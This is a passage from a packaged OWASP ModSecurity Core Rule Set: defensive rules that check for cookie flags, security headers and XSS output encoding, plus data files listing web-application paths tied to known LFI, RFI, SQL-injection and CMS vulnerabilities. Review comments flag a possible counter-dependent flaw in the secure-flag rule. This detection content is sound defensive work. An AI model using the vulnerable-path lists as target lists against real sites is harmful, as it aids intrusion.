# - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-secure-flag
# - https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet#Rule_-_Use_.22Secure.22_Cookie_Flag
#
# NOTE(review): the site is treated as HTTPS only when SERVER_PORT is exactly
# 443, so TLS on another port or terminated in front of this server is not
# covered.
# NOTE(review): the secure_site environment variable is set inside the chain
# that starts with the "@le 10" counter check. Once the counter exceeds 10 the
# chain appears to stop at its first rule, so secure_site would no longer be
# set and the "Fix Missing secure Flag" directive below (env=secure_site)
# would stop adding the flag until the counter expires - confirm, and
# consider setting secure_site in a rule that does not depend on the counter.
# The detection pattern has the same order-dependence as the HttpOnly check.
SecRule &GLOBAL:MISSING_SECURE "@eq 0" "phase:3,t:none,nolog,pass,id:'981236',setvar:global.missing_secure=0"
SecRule GLOBAL:MISSING_SECURE "@le 10" "chain,phase:3,id:'981185',t:none,pass,log,auditlog,msg:'AppDefect: Missing Secure Cookie Flag for %{tx.1}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-secure-flag'"
        SecRule SERVER_PORT "@streq 443" "chain,t:none,setenv:secure_site"
                SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(.*?)=(?i)(?!.*secure.*)(.*$)" "capture,setvar:global.missing_secure=+1,expirevar:global.missing_secure=86400"

#
# [ Fix Missing "secure" Flag ]
#
Header edit Set-Cookie "^((?i:(_?(COOKIE|TOKEN)|atlassian.xsrf.token|[aj]?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))=(?i:(?!secure).)+)$" "$1; secure" env=secure_site

##############################################################################
# -=[ HTTP Header Checks ]=-
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#header
##############################################################################
#
# [ Check that the cache-control HTTP header is set to 'no-store' ]
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-cache-control-header-no-store
#
SecRule &GLOBAL:CHECK_CACHE_CONTROL "@eq 0" "phase:5,t:none,nolog,pass,id:'981239',setvar:global.check_cache_control=0"
SecRule GLOBAL:CHECK_CACHE_CONTROL "@le 10" "chain,phase:5,id:'900046',t:none,pass,log,auditlog,msg:'AppDefect: Cache-Control Response Header Missing \'no-store\' flag.',logdata:'Cache-Control: %{response_headers.cache-control}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-cache-control-header-no-store'" SecRule RESPONSE_HEADERS:Cache-Control "!@contains no-store" "t:none,t:lowercase,setvar:global.check_cache_control=+1,expirevar:global.check_cache_control=86400" # # [ Check that a Content-Type header is included in the HTTP response ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-content-type-header-missing # SecRule &GLOBAL:CONTENT_TYPE_HEADER_EXISTS "@eq 0" "phase:5,t:none,nolog,pass,id:'981400',setvar:global.content_type_header_exists=0" SecRule GLOBAL:CONTENT_TYPE_HEADER_EXISTS "@le 10" "chain,phase:5,id:'981401',t:none,pass,log,auditlog,msg:'AppDefect: Content-Type Response Header is Missing or Empty.',logdata:'Content-Type: %{response_headers.content-type}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-content-type-header-missing'" SecRule &RESPONSE_HEADERS:Content-Type|RESPONSE_HEADERS:Content-Type "^0$|^$" "t:none,setvar:global.content_type_header_exists=+1,expirevar:global.content_type_header_exists=86400" # # [ Check that IE's XSS protection filter is not being disabled by the Web-application ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#internet-explorer-xss-filter-disabled # SecRule &GLOBAL:X_XSS_PROTECTION_DISABLED "@eq 0" "phase:5,t:none,nolog,pass,id:'981402',setvar:global.x_xss_protection_disabled=0" SecRule GLOBAL:X_XSS_PROTECTION_DISABLED "@le 10" "chain,phase:5,id:'981403',t:none,pass,log,auditlog,msg:'AppDefect: IE8\'s XSS protection Filter is Disabled.',logdata:'X-XSS-Protection: 
%{response_headers.x-xss-protection}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#internet-explorer-xss-filter-disabled'" SecRule RESPONSE_HEADERS:X-XSS-Protection "@streq 0" "t:none,setvar:global.x_xss_protection_disabled=+1,expirevar:global.x_xss_protection_disabled=86400" # # [ Check that the X-FRAME-OPTIONS header is being set for Clickjacking defense ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-frame-options # SecRule &GLOBAL:X_FRAME_OPTIONS "@eq 0" "phase:5,t:none,nolog,pass,id:'981404',setvar:global.x_frame_options=0" SecRule GLOBAL:X_FRAME_OPTIONS "@le 10" "chain,phase:5,id:'981405',t:none,pass,log,auditlog,msg:'AppDefect: X-FRAME-OPTIONS Response Header is Missing or not set to Deny.',logdata:'X-FRAME-OPTIONS: %{response_headers.x-frame-options}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-frame-options'" SecRule &RESPONSE_HEADERS:X-FRAME-OPTIONS|RESPONSE_HEADERS:X-FRAME-OPTIONS "^(?i:0|allow)$" "t:none,setvar:global.x_frame_options=+1,expirevar:global.x_frame_options=86400" # # [ Checks that the X-CONTENT-TYPE-OPTIONS defense against MIME-sniffing has been declared ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-content-type-options # SecRule &GLOBAL:X_CONTENT_TYPE_OPTIONS "@eq 0" "phase:5,t:none,nolog,pass,id:'981406',setvar:global.x_content_type_options=0" SecRule &RESPONSE_HEADERS:Content-Type|RESPONSE_HEADERS:Content-Type "^0$|^$" "chain,phase:5,id:'981407',t:none,pass,log,auditlog,msg:'AppDefect: Content-Type Response Header is Missing and X-Content-Type-Options is either missing or not set to \'nosniff\'.',logdata:'X-Content-Type-Options: %{response_headers.x-content-type-options}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-content-type-options'" SecRule 
GLOBAL:X_CONTENT_TYPE_OPTIONS "@le 10" "chain" SecRule &RESPONSE_HEADERS:X-Content-Type-Options|RESPONSE_HEADERS:X-Content-Type-Options "^0$|^[a-z]+(?<!:nosniff)" "t:none,t:lowercase,setvar:global.x_content_type_options=+1,expirevar:global.x_content_type_options=86400" # XSS Detection - Missing Output Encoding # SecAction "phase:1,id:'900047',nolog,pass,initcol:global=xss_list" # # Identifies Reflected XSS # If malicious input (with Meta-Characters) is echoed back in the reply non-encoded. # SecRule &ARGS "@gt 0" "chain,phase:4,id:'900048',t:none,log,auditlog,deny,status:403,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded.',logdata:'%{tx.inbound_meta-characters}'" SecRule ARGS "([\'\"\(\)\;<>#])" "chain,t:none" SecRule MATCHED_VAR "^.{15,}$" "chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}" SecRule RESPONSE_BODY "@contains %{tx.inbound_meta-characters}" "ctl:auditLogParts=+E" # # Check to see if TX XSS Data is already in the GLOBAL list. If it is - expire it. SecRule GLOBAL:'/XSS_LIST_.*/' "@streq %{tx.inbound_meta-characters}" "phase:4,id:'981180',t:none,nolog,pass,skip:1" SecRule TX:INBOUND_META-CHARACTERS ".*" "phase:4,id:'981181',t:none,nolog,pass,setvar:global.xss_list_%{time_epoch}=%{matched_var}" # # Identifies Stored XSS # If malicious input (with Meta-Characters) is echoed back on any page non-encoded. 
SecRule GLOBAL:'/XSS_LIST_.*/' "@within %{response_body}" "phase:4,id:'981182',t:none,log,auditlog,pass,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded',tag:'WEB_ATTACK/XSS'" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_55_marketing.conf�����������0000664�0000000�0000000�00000002256�12164572564�0032227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # These rules do not have a security importance, but shows other benefits of # monitoring and logging HTTP transactions. # -- SecRule REQUEST_HEADERS:User-Agent "msn(?:bot|ptc)" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'MSN robot activity',id:'910008',severity:'6'" SecRule REQUEST_HEADERS:User-Agent "\byahoo(?:-(?:mmcrawler|blogs)|! 
slurp)\b" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'Yahoo robot activity',id:'910007',severity:'6'" SecRule REQUEST_HEADERS:User-Agent "(?:(?:gsa-crawler \(enterprise; s4-e9lj2b82fjjaa; me\@mycompany\.com|adsbot-google \(\+http:\/\/www\.google\.com\/adsbot\.html)\)|\b(?:google(?:-sitemaps|bot)|mediapartners-google)\b)" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'Google robot activity',id:'910006',severity:'6'" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/�������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0022536�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_joomla.data����������������0000664�0000000�0000000�00000003303�12164572564�0031161�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/acomponents/com_mamboleto/mamboleto.php /admin.rssreader.php /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php /administrator/components/com_jwmmxtd/admin.jwmmxtd.php 
/administrator/components/com_sqlreport/ajax/print.php /administrator/components/com_universal/includes/config/config.html.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /administrator/components/com_xcloner-backupandrestore/index2.php /com_koesubmit/koesubmit.php /com_ongumatimesheet20/lib/onguma.class.php /com_rwcards/rwcards.advancedate.php /com_swmenupro/ImageManager/Classes/ImageManager.php /com_xmovie/helpers/img.php /components/com_ajaxchat/tests/ajcuser.php /components/com_banners/banners.class.php /components/com_ezine/class/php/d4m_ajax_pagenav.php /components/com_intuit/models/intuit.php /components/com_jcalpro/cal_popup.php /components/com_mediaslide/viewer.php /components/com_mgm/help.mgm.php /components/com_mojo/wp-comments-post.php /components/com_mojo/wp-trackback.php /components/com_moofaq/includes/file_includer.php /components/com_morfeoshow/morfeoshow.html.php /components/com_smartformer/smartformer.php /components/com_xgallery/helpers/img.php /config.dadamail.php /database/table/user.php /example.php /gmail.php /index.php /letterman.class.php /models/category.php /modules/mod_mainmenu/menu.php /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php /plugins/authentication/ldap.php /plugins/search/categories.php /plugins/search/contacts.php /plugins/search/content.php /plugins/search/sections.php /plugins/search/weblinks.php /plugins/user/example.php /real_estate/index.php 
admin.ponygallery.html.php�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_lfi.data�������������������0000664�0000000�0000000�00000010221�12164572564�0030447�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/123flashchat.php /ADM_Pagina.php /ST_browsers.php /ST_countries.php /ST_platforms.php /_conf/core/common-tpl-vars.php /_footer.php /_functions.php /acopia/manager/DiagCaptureFileListActionBody.do /acopia/manager/DiagLogListActionBody.do /acopia/sat/ViewInventoryErrorReport.do /acopia/sat/ViewSatReport.do /active_auctions.php /addedit-render.php /admin/admin_groups_reapir.php /admin/admin_smilies.php /admin/admin_words.php /admin/loadplugin.php /admin/thumbnailformpost.inc.php /admin/upgrade_unattended.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /api/download_launch.php /arch.php /artmedic_print.php /authenticate/sessions.php /baconmap/admin/updatelist.php /bin/qte_init.php /block_center_down.php /block_center_top.php /block_left.php /block_right.php /body_default.php /books/getConfig.php /centre.php /chat/dac.php /classes/BxDolGzip.php /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php /classes/flash_mp3_player/extras/external_feeds/getfeed.php /cms_detect.php /com_xmovie/helpers/img.php /components/com_intuit/models/intuit.php /components/com_mediaslide/viewer.php 
/components/com_moofaq/includes/file_includer.php /components/com_xgallery/helpers/img.php /config.dadamail.php /config.php /container.php /content/dynpage_load.php /cron.php /cuenta/cuerpo.php /cultbooking.php /debugger/debug_php.php /detail.php /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php /dm-albums/template/album.php /doku.php /download.php /examples/tbs_us_examples_0view.php /export.php /footer.inc.php /forum.php /gradebook/open_document.php /header.inc.php /header.php /include/global.php /include/timesheet.php /include/unverified.inc.php /includes/esqueletos/skel_null.php /includes/function_core.php /includes/header.php /includes/initsystem.php /includes/startmodules.inc.php /index.php /index_inc.php /infusions/last_seen_users_panel/last_seen_users_panel.php /init.php /latestposts.php /lib/function.php /lib/lcUser.php /library/setup/rpc.php /locales.php /locms/smarty.php /login.tpl.php /main.inc.php /maincore.php /message_class.php /mini.php /mods/ckeditor/filemanager/connectors/php/connector.php /module.php /modules/3rdparty/adminpart/add3rdparty.php /modules/articles/adminpart/addarticles.php /modules/brandnews/adminpart/addbrandnews.php /modules/comments.php /modules/contact/adminpart/addcontact.php /modules/core/security/init.php /modules/game/adminpart/addgame.php /modules/login.php /modules/maticmarket/bleu/blanc/bas.php /modules/maticmarket/bleu/blanc/haut.php /modules/maticmarket/bleu/default/bas.php /modules/maticmarket/bleu/default/haut.php /modules/maticmarket/bleu/gold/bas.php /modules/maticmarket/bleu/gold/haut.php /modules/maticmarket/deco/blanc/bas.php /modules/maticmarket/deco/blanc/haut.php /modules/newsletter/adminpart/addnewsletter.php /modules/plain/adminpart/addplain.php /modules/polling/adminpart/addpolling.php /modules/product/adminpart/addproduct.php /modules/profile/user.php /modules/tour/adminpart/addtour.php /news/search.php3 /news_show.php /oldnews_reader.php /op/op.Login.php /passwiki.php /pcltar.lib.php 
/plog-includes/lib/phpthumb/phpThumb.php /plugin/gateway/gnokii/init.php /plugin/themes/default/init.php /plugins/PluginController.php /plugins/filemanager/get_file.php /plugins/templateie/lib/templateie_install.class.php /pmscript.php /portfolio/css.php /preview.php /qlib/smarty.inc.php /qte_web.php /resource_categories_view.php /scr/soustab.php /section.php /server_request.php /show_joined.php /sitemap.xml.php /snippet.reflect.php /spaw_control.class.php /stage1.php /stage4.php /stage6.php /telecharger.php /templater.php /templates/layout_lyrics.php /threadstop/threadstop.php /tiki-jsplugin.php /update_trailer.php /urheber.php /util/barcode.php /vars.inc.php /viewsource.php /website.php /windetail.php /window_down.php /window_top.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php app=urchin.cgi functions_navlinks.php profile_send.php 
viewtopic_PM-link.php�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_phpbb.data�����������������0000664�0000000�0000000�00000000311�12164572564�0030767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������.php /acp_lcxbbportal.php /admin/admin_acronyms.php /admin/admin_groups_reapir.php /admin/admin_smilies.php /admin/admin_words.php /admin_hacks_list.php /include/global.php /index.php /portal_block.php�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_rfi.data�������������������0000664�0000000�0000000�00000030356�12164572564�0030470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������.php /123flashchat.php /2checkout_return.inc.php /ADM_Pagina.php 
/Admin/ResellersManager.class.php /Base/example_1.php /Clickheat/Cache.php /Clickheat_Heatmap.php /CoupleDB.php /Customers/PDPEmailReplaceConstants.class.php /DB_adodb.class.php /Framework/EmailTemplates.class.php /GlobalVariables.php /HTMLSax3.php /LSTable.php /OpenSiteAdmin/pages/pageHeader.php /ST_browsers.php /ST_countries.php /ST_platforms.php /SezHooTabsAndActions.php /Thumbnail.php /_conf/core/common-tpl-vars.php /_footer.php /_functions.php /acomponents/com_mamboleto/mamboleto.php /acopia/manager/DiagCaptureFileListActionBody.do /acopia/manager/DiagLogListActionBody.do /acopia/sat/ViewInventoryErrorReport.do /acopia/sat/ViewSatReport.do /acp_lcxbbportal.php /action.php /active_auctions.php /activities/workflow-activities.php /add_comments.php /addedit-render.php /adm/krgourl.php /admin.googlebase.php /admin.rssreader.php /admin/admin_groups_reapir.php /admin/admin_news_bot.php /admin/admin_smilies.php /admin/admin_words.php /admin/frontpage_right.php /admin/global.php /admin/loadplugin.php /admin/thumbnailformpost.inc.php /admin/upgrade_unattended.php /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php /administrator/components/com_jwmmxtd/admin.jwmmxtd.php /administrator/components/com_universal/includes/config/config.html.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /application/views/public/commentform.php /arch.php /archive.php /ardeaCore/lib/core/ardeaBlog.php /ardeaCore/lib/core/ardeaInit.php /ardeaCore/lib/core/mvc/ardeaMVC.php /artmedic_print.php /assets/plugins/mp3_id/mp3_id.php /authenticate/sessions.php /awcm/control/common.php /awcm/header.php /awcm/includes/window_top.php /baconmap/admin/updatelist.php /base/Archive.php /base/Comments.php /base/News.php /base/SendFriend.php /base_qry_common.php /base_stat_common.php /basicfogfactory.class.php /bazar/picturelib.php /berylium-classes.php /bin/qte_init.php /block.php 
/block_center_down.php /block_center_top.php /block_left.php /block_right.php /blocks/file/controller.php /blocks/headerfile.php /body_comm.inc.php /body_default.php /centre.php /ch_readalso.php /chat/dac.php /checkout.php /class.csv.php /class.phpmailer.php /class_yapbbcooker.php /classes/excel/class.writeexcel_workbook.inc.php /classes/excel/class.writeexcel_worksheet.inc.php /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php /classes/flash_mp3_player/extras/external_feeds/getfeed.php /cms/modules/form.lib.php /cms_detect.php /collectivite.class.php /com_del.php /com_koesubmit/koesubmit.php /com_ongumatimesheet20/lib/onguma.class.php /com_rwcards/rwcards.advancedate.php /com_swmenupro/ImageManager/Classes/ImageManager.php /com_xmovie/helpers/img.php /comments.php /common.php /common/errormsg.php /common/func.php /components/com_ajaxchat/tests/ajcuser.php /components/com_banners/banners.class.php /components/com_ezine/class/php/d4m_ajax_pagenav.php /components/com_intuit/models/intuit.php /components/com_jcalpro/cal_popup.php /components/com_mediaslide/viewer.php /components/com_mgm/help.mgm.php /components/com_mojo/wp-comments-post.php /components/com_mojo/wp-trackback.php /components/com_moofaq/includes/file_includer.php /components/com_morfeoshow/morfeoshow.html.php /components/com_smartformer/smartformer.php /components/com_smf/smf.php /components/com_xgallery/helpers/img.php /config.dadamail.php /config.php /container.php /content/dynpage_load.php /content/themes/softsaurus_default/pages/subHeader.php /content/themes/softsaurus_stretched/pages/subHeader.php /core/includes/gfw_smarty.php /courrier.class.php /cron.php /cuenta/cuerpo.php /cultbooking.php /customer_ftp.php /datumscalc.php /debugger.php /debugger/debug_php.php /define.php /detail.php /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php /display.php /dm-albums/template/album.php /doku.php /dompdf.php /don3_requiem.php /dosearch.php /download.php /downloads.php 
/dp_logs.php /e-pay/src/a_affil.php /e107_handlers/secure_img_handler.php /e107_plugins/trackback/trackbackClass.php /editor/edit_htmlarea.php /editors/FCKeditor/editor_registry.php /editors/dhtmltextarea/editor_registry.php /editors/tinymce/editor_registry.php /emailsender.php /embedforum.php /engine/api/api.class.php /example_clientside_javascript.php /examples/tbs_us_examples_0view.php /examples/widget8.php /export.php /export_batch.inc.php /extensions/saurus4/captcha_image.php /familynews.php /faq.php /filepool.php /files/blocks/latest_files.php /filters/headerfile.php /fonctions_racine.php /footer.inc.php /footer.php /forum.php /forums/blocks/latest_posts.php /frontpage.php /ftp.php /functionen/ref_kd_rubrik.php /functions.php /functions_install.php /gallery2/lib/adodb/adodb-error.inc.php /gbookmx/gbook.php /get_header.php /global.php /groups/headerfile.php /gunaysoft.php /handle/proxy.php /handlers/page/show.php /header.inc.php /header.php /heatmap/_main.php /heatmap/main.php /help.php /hg_referenz_jobgalerie.php /html.php /html2.php /iframe.php /inc/articles.inc.php /inc/content.inc.php /inc/logingecon.php /include/_bot.php /include/addons/version/pages/index.inc.php /include/admin.lib.inc.php /include/admin/device_admin.php /include/classes/file.class.php /include/engine/content/elements/menu.php /include/global.php /include/header.php /include/libs/internals/core.process_compiled_include.php /include/libs/internals/core.write_compiled_include.php /include/libs/plugins/function.config_load.php /include/logout.php /include/pages/specials.inc.php /include/payment/payflow_pro.php /include/prodler.class.php /include/timesheet.php /include/top_graph_header.php /include/unverified.inc.php /includes/Cache/Lite/Output.php /includes/ajax_listado.php /includes/classes/pctemplate.php /includes/common.php /includes/competitions/add.php /includes/competitions/competitions.php /includes/converter.inc.php /includes/esqueletos/skel_null.php 
/includes/file_manager/special.php /includes/footer.php /includes/function_core.php /includes/header.inc.php /includes/header.php /includes/hnmain.inc.php3 /includes/include.php /includes/includes.php /includes/init.php /includes/initsystem.php /includes/language.php /includes/messages.inc.php /includes/settings.inc.php /includes/settings/settings.php /includes/startmodules.inc.php /includes/workspace.php /index.php /index_inc.php /index_logged.php /infusions/last_seen_users_panel/last_seen_users_panel.php /init.php /install.clickheat.php /install/di.php /js/wptable-button.php /js/wptable-tinymce.php /language/1/splash.lang.php /last_gallery.php /latestposts.php /layout_admin_cfg.php /layout_cfg.php /layouts/standard.php /left_menu.php /lib.module.php /lib/FSphp.php /lib/action/rss.php /lib/addressbook.php /lib/function.php /lib/layout/layoutHeaderFuncs.php /lib/layout/layoutManager.php /lib/layout/layoutParser.php /lib/lcUser.php /lib/navigation.php /lib/page/pageDescriptionObject.php /lib/pathwirte.php /lib/smarty/SmartyFU.class.php /libraries/database.php /libraries/lib-remotehost.inc.php /library/setup/rpc.php /libs/db.php /libs/ftp.php /libs/lom.php /libsecure.php /linkadmin.php /links/blocks/links.php /load_lang.php /locales.php /locms/smarty.php /login.php /login.tpl.php /logout.php /lom_update.php /ltdialogo.php /main.inc.php /main/forum/komentar.php /main_prepend.php /maincore.php /membres/membreManager.php /menu/headerfile.php /message_class.php /mini.php /mod/image/index.php /mod/liens/index.php /mod/liste/index.php /mod/special/index.php /mod/texte/index.php /mod/vm/controller/AccessController.php /mod/vm/model/dao.php /mods/ckeditor/filemanager/connectors/php/connector.php /module.php /module/referenz.php /modules/3rdparty/adminpart/add3rdparty.php /modules/admin/include/config.php /modules/articles/adminpart/addarticles.php /modules/brandnews/adminpart/addbrandnews.php /modules/comments.php /modules/contact/adminpart/addcontact.php 
/modules/core/logger/init.php /modules/core/security/init.php /modules/dfss/lgsl/lgsl_players.php /modules/dfss/lgsl/lgsl_settings.php /modules/formmailer/formmailer.admin.inc.php /modules/game/adminpart/addgame.php /modules/guestbook/blocks/control.block.php /modules/login.php /modules/maticmarket/bleu/blanc/bas.php /modules/maticmarket/bleu/blanc/haut.php /modules/maticmarket/bleu/default/bas.php /modules/maticmarket/bleu/default/haut.php /modules/maticmarket/bleu/gold/bas.php /modules/maticmarket/bleu/gold/haut.php /modules/maticmarket/deco/blanc/bas.php /modules/maticmarket/deco/blanc/haut.php /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php /modules/newsletter/adminpart/addnewsletter.php /modules/noevents/templates/mfa_theme.php /modules/plain/adminpart/addplain.php /modules/polling/adminpart/addpolling.php /modules/product/adminpart/addproduct.php /modules/profile/user.php /modules/tour/adminpart/addtour.php /modules/users/headerfile.php /monatsblatt.php /mtdialogo.php /mw_plugin.php /nettools.popup.php /news.php /news/blocks/latest_news.php /news/search.php3 /news_show.php /newscat.php /nucleus/libs/PLUGINADMIN.php /nucleus/media.php /nucleus/xmlrpc/server.php /obj/action.class.php /obj/architecte.class.php /obj/avis.class.php /obj/bible.class.php /obj/blocnote.class.php /oldnews_reader.php /op/op.Login.php /overview/main.php /passwiki.php /pcltar.lib.php /pcltrace.lib.php /pear.php /pingsvr.php /plugin/HP_DEV/cms2.php /plugin/gateway/gnokii/init.php /plugin/themes/default/init.php /plugin_admin.php /plugins/PluginController.php /plugins/filemanager/get_file.php /plugins/templateie/lib/templateie_install.class.php /pmscript.php /portal_block.php /portfolio/css.php /prepend.php /preview.php /produkte_nach_serie.php /produkte_nach_serie_alle.php /profil.class.php /psg.smarty.lib.php /public/code/cp_html2xhtmlbasic.php /qlib/smarty.inc.php /qte_web.php /real_estate/index.php 
/ref_kd_rubrik.php /resource_categories_view.php /resources/includes/class.Smarty.php /rss_importer_functions.php /run_auto_suspend.cron.php /safehtml.php /scorm/lib.inc.php /scr/soustab.php /scripts/check-lom.php /scripts/weigh_keywords.php /search.php /section.php /send_email_cache.php /send_reminders.php /server_request.php /settings.php /settings/headerfile.php /show_joined.php /site_conf.php /sitemap.xml.php /skins/header.php /skins/phpchess/layout_t_top.php /slogin_lib.inc.php /smallaxe-0.3.1/inc/linkbar.php /snippet.reflect.php /spaw_control.class.php /stage1.php /stage4.php /stage6.php /standard/1/lay.php /standard/3/lay.php /startup.php /sublink.php /surfer_aendern.php /surfer_anmeldung_NWL.php /system/pageTemplate.php /system/utilities.php /templater.php /templates/default/tpl_message.php /templates/layout_lyrics.php /test/pages/contact.php /theme/format.php /threadstop/threadstop.php /tiki-jsplugin.php /tmsp/add_tmsp.php /tmsp/edit_tmsp.php /tmsp/subscription.php /tmsp/tmsp.php /toolbar.php /tools/filemanager/skins/mobile/admin1.template.php /update_trailer.php /urheber.php /user/turbulence.php /utdb_access.php /utgn_message.php /util/barcode.php /utilisateur.class.php /vars.inc.php /velid3/getid3.php /velid3/module.archive.gzip.php /view_blog_archives.php /view_blog_comments.php /view_messages.php /views/print/printbar.php /viewsource.php /viewver.php /watermark.php /web/lom.php /website.php /windetail.php /window_down.php /window_top.php /wordtube-button.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php /www/lib/head_auth.php admin.ponygallery.html.php app=urchin.cgi crea.php create_file.php droit.class.php functions_navlinks.php plugins/links/functions.inc plugins/polls/functions.inc 
plugins/spamx/BlackList.Examine.class.php plugins/spamx/DeleteComment.Action.class.php plugins/spamx/EditHeader.Admin.class.php plugins/spamx/EditIP.Admin.class.php plugins/spamx/EditIPofURL.Admin.class.php plugins/spamx/IPofUrl.Examine.class.php plugins/spamx/Import.Admin.class.php plugins/spamx/LogView.Admin.class.php plugins/spamx/MTBlackList.Examine.class.php plugins/spamx/MailAdmin.Action.class.php plugins/spamx/MassDelTrackback.Admin.class.php plugins/spamx/MassDelete.Admin.class.php plugins/staticpages/functions.inc profile_send.php viewtopic_PM-link.php����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_sqli.data������������������0000664�0000000�0000000�00000016320�12164572564�0030653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/ASPKAT.ASP /DocPay.w2b /G_Display.php /HABERLER.ASP /HaberDetay.asp /News/page.asp /OmegaMw7.asp /ProductDetails.asp /Search/DisplayResults.php /SecureLoginManager/list.asp /SelGruFra.asp /Types.asp /ViewBugs.php /ViewCat.php /ViewReport.php /WorkOrder.do /account_change.php /activeNews_categories.asp /activeNews_comments.asp /activenews_search.asp /activenews_view.asp /actualpic.asp /ad.asp /add2.php /add_comment.php /addrating.php /admin.asp /admin.php /admin/admin_acronyms.php /admin/admin_annonce/changeannonce.php /admin/admin_annonce/okvalannonce.php /admin/admin_mail_adressee.asp /admin/admin_membre/fiche_membre.php 
